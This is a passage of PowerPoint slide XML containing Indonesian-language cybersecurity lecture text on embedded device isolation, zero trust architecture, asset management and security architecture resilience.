              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengisolasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih-alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas "di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" dan "di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22965767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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelektual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
